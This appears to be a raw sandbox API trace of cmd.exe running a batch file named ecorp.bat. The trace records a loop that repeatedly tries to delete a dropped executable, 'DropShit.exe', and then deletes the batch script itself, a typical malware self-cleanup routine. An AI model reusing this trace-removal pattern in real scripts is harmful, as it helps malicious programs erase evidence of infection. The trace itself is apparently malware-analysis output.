_wcsicmp (_String1="del", _String2="DEL") returned 0 [0091.693] GetProcessHeap () returned 0x250000 [0091.693] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x251980 [0091.693] GetProcessHeap () returned 0x250000 [0091.693] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x251980, Size=0x30) returned 0x251980 [0091.693] GetProcessHeap () returned 0x250000 [0091.693] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x251980) returned 0x30 [0091.693] GetProcessHeap () returned 0x250000 [0091.693] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x38) returned 0x266aa0 [0091.693] GetProcessHeap () returned 0x250000 [0091.693] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x2519c0 [0091.694] GetProcessHeap () returned 0x250000 [0091.694] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2519c0, Size=0x30) returned 0x2519c0 [0091.694] GetProcessHeap () returned 0x250000 [0091.694] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2519c0) returned 0x30 [0091.694] GetProcessHeap () returned 0x250000 [0091.694] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266ae0 [0091.694] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.694] GetProcessHeap () returned 0x250000 [0091.694] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x251a00 [0091.694] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.694] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0091.694] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0091.694] GetProcessHeap () returned 0x250000 [0091.694] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x251a60 [0091.694] GetProcessHeap () returned 0x250000 [0091.694] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x251ac0 [0091.695] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.695] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.695] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.695] GetProcessHeap () returned 0x250000 [0091.695] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x27a760 [0091.695] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x27a770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.695] SetErrorMode (uMode=0x0) returned 0x0 [0091.695] SetErrorMode (uMode=0x1) returned 0x0 [0091.695] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14d780*="DropShit.exe") returned 0x32 [0091.695] SetErrorMode (uMode=0x0) returned 0x1 [0091.696] GetProcessHeap () returned 0x250000 [0091.696] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x27a980 [0091.696] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0091.696] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0091.696] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0091.696] GetProcessHeap () returned 0x250000 [0091.696] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266b20 [0091.696] GetProcessHeap () returned 0x250000 [0091.696] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x251d30 [0091.696] GetProcessHeap () returned 0x250000 [0091.696] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x27abf0 [0091.696] GetProcessHeap () returned 0x250000 [0091.696] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x27ac60 [0091.696] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x0, lpFindFileData=0x27ac74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27ac74) returned 0x27b480 [0091.696] GetProcessHeap () returned 0x250000 [0091.696] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2645e0, Size=0x8) returned 0x269fd0 [0091.696] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.697] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0091.697] GetLastError () returned 0x5 [0091.697] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x14dc38 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe\r\n") returned 52 [0091.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.697] GetFileType (hFile=0x7) returned 0x2 [0091.697] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.697] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14dbc8 | out: lpMode=0x14dbc8) returned 1 [0091.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.697] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14dc08, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14dc08*=0x34) returned 1 [0091.697] _get_osfhandle (_FileHandle=2) returned 0xb [0091.697] GetFileType (hFile=0xb) returned 0x2 [0091.698] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0091.698] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14db68 | out: lpMode=0x14db68) returned 1 [0091.698] _get_osfhandle (_FileHandle=2) returned 0xb [0091.698] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14dba0 | out: lpConsoleScreenBufferInfo=0x14dba0) returned 1 [0091.698] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.699] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x14dc10 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0091.699] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x14db90, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14db90*=0x13) returned 1 [0091.699] FindNextFileW (in: hFindFile=0x27b480, lpFindFileData=0x27ac74 | out: lpFindFileData=0x27ac74*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 0 [0091.700] GetLastError () returned 0x12 [0091.700] FindClose (in: hFindFile=0x27b480 | out: hFindFile=0x27b480) returned 1 [0091.700] GetProcessHeap () returned 0x250000 [0091.700] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27ac60 | out: hHeap=0x250000) returned 1 [0091.700] GetProcessHeap () returned 0x250000 [0091.700] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27abf0 | out: hHeap=0x250000) returned 1 [0091.700] GetProcessHeap () returned 0x250000 [0091.701] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266b20 | out: hHeap=0x250000) returned 1 [0091.701] GetProcessHeap () returned 0x250000 [0091.701] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251d30 | out: hHeap=0x250000) returned 1 [0091.701] GetProcessHeap () returned 0x250000 [0091.701] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a980 | out: hHeap=0x250000) returned 1 [0091.701] GetProcessHeap () returned 0x250000 [0091.701] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a760 | out: hHeap=0x250000) returned 1 [0091.701] GetProcessHeap () returned 0x250000 [0091.701] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251ac0 | out: hHeap=0x250000) returned 1 [0091.701] GetProcessHeap () returned 0x250000 [0091.701] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a60 | out: hHeap=0x250000) returned 1 [0091.701] GetProcessHeap () returned 0x250000 [0091.701] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251a00 | out: hHeap=0x250000) returned 1 [0091.701] GetProcessHeap () returned 0x250000 [0091.701] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266ae0 | out: hHeap=0x250000) returned 1 [0091.701] GetProcessHeap () returned 0x250000 [0091.701] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2519c0 | out: hHeap=0x250000) returned 1 [0091.701] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.701] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0091.743] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.743] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0091.743] _get_osfhandle (_FileHandle=0) returned 0x3 [0091.743] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0091.744] SetConsoleInputExeNameW () returned 0x1 [0091.744] GetConsoleOutputCP () returned 0x1b5 [0091.744] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0091.744] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.745] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.745] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.745] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.745] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.745] GetProcessHeap () returned 0x250000 [0091.745] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0091.745] GetProcessHeap () returned 0x250000 [0091.745] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251980 | out: hHeap=0x250000) returned 1 [0091.745] GetProcessHeap () returned 0x250000 [0091.745] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0091.745] GetProcessHeap () returned 0x250000 [0091.745] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0091.745] GetProcessHeap () returned 0x250000 [0091.745] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0091.745] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.745] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0091.745] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x34, lpOverlapped=0x0) returned 1 [0091.745] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.745] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=37, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="if exist \"DropShit.exe\" goto Repeat\r\n") returned 37 [0091.746] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.746] GetFileType (hFile=0x5c) returned 0x1 [0091.746] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.746] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.746] GetProcessHeap () returned 0x250000 [0091.746] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26ccf0 [0091.746] GetProcessHeap () returned 0x250000 [0091.746] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0091.746] GetProcessHeap () returned 0x250000 [0091.746] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x2518c0 [0091.746] GetProcessHeap () returned 0x250000 [0091.746] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x27a2f0 [0091.746] GetProcessHeap () returned 0x250000 [0091.746] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x2645e0 [0091.747] GetProcessHeap () returned 0x250000 [0091.747] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2645e0, Size=0x1e) returned 0x264610 [0091.747] GetProcessHeap () returned 0x250000 [0091.747] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x264610) returned 0x1e [0091.747] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0091.747] GetProcessHeap () returned 0x250000 [0091.747] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x251980 [0091.747] GetProcessHeap () returned 0x250000 [0091.747] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x2645e0 [0091.747] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0091.747] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0091.747] GetProcessHeap () returned 0x250000 [0091.747] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0091.747] GetProcessHeap () returned 0x250000 [0091.747] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4c) returned 0x251a40 [0091.747] GetProcessHeap () returned 0x250000 [0091.747] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x251a40, Size=0x30) returned 0x251a40 [0091.747] GetProcessHeap () returned 0x250000 [0091.747] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x251a40) returned 0x30 [0091.747] GetProcessHeap () returned 0x250000 [0091.747] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x251a80 [0091.747] GetProcessHeap () returned 0x250000 [0091.747] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x278f90 [0091.747] GetProcessHeap () returned 0x250000 [0091.747] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x278fc0 [0091.747] _tell (_FileHandle=3) returned 66 [0091.748] _close (_FileHandle=3) returned 0 [0091.748] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0091.748] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.748] GetFileType (hFile=0x7) returned 0x2 [0091.748] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.748] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0091.748] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.748] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0091.748] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0091.748] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0091.748] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0091.749] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.749] GetFileType (hFile=0x7) returned 0x2 [0091.749] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.749] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0091.749] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.749] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0091.749] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer="if ") returned 3 [0091.749] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.749] GetFileType (hFile=0x7) returned 0x2 [0091.749] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.749] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.750] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.750] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x3) returned 1 [0091.750] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x14efa8 | out: _Buffer="exist \"DropShit.exe\" ") returned 21 [0091.750] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.750] GetFileType (hFile=0x7) returned 0x2 [0091.750] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.750] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.750] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.750] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x15) returned 1 [0091.750] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.750] GetFileType (hFile=0x7) returned 0x2 [0091.751] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.751] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.751] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.751] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x278fa0*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x278fa0*, lpNumberOfCharsWritten=0x14efa8*=0x4) returned 1 [0091.751] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efa8 | out: _Buffer=" Repeat ") returned 8 [0091.751] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.751] GetFileType (hFile=0x7) returned 0x2 [0091.751] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.751] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0091.752] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.752] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1 [0091.752] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0091.752] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.752] GetFileType (hFile=0x7) returned 0x2 [0091.752] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.752] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0091.752] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.752] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0091.752] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x208, lpBuffer=0x14eae0, lpFilePart=0x14e880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14e880*="DropShit.exe") returned 0x32 [0091.752] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0091.752] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x1, lpFindFileData=0x14e890, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e890) returned 0x251b40 [0091.753] FindClose (in: hFindFile=0x251b40 | out: hFindFile=0x251b40) returned 1 [0091.753] GetConsoleTitleW (in: lpConsoleTitle=0x14ec40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0091.753] GetProcessHeap () returned 0x250000 [0091.753] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266aa0 [0091.753] GetProcessHeap () returned 0x250000 [0091.753] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x266aa0, Size=0x20) returned 0x278ff0 [0091.753] GetProcessHeap () returned 0x250000 [0091.753] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x278ff0) returned 0x20 [0091.753] GetProcessHeap () returned 0x250000 [0091.753] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266aa0 [0091.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e6f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0091.753] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0091.753] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.753] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.753] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.753] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51 [0091.753] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.753] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.753] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.753] GetFileType (hFile=0x5c) returned 0x1 [0091.753] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0091.754] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0xf, lpOverlapped=0x0) returned 1 [0091.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=15, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr="del ecorp.bat\r\n") returned 15 [0091.754] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.754] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.754] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.754] GetFileType (hFile=0x5c) returned 0x1 [0091.754] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.754] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x0, lpOverlapped=0x0) returned 1 [0091.754] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.754] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.754] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.754] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.754] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.754] GetFileType (hFile=0x5c) returned 0x1 [0091.754] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.754] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x51, lpOverlapped=0x0) returned 1 [0091.754] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0091.754] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=9, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr=":Repeat\r\n.bat\r\n") returned 9 [0091.754] _close (_FileHandle=3) returned 0 [0091.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0091.754] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 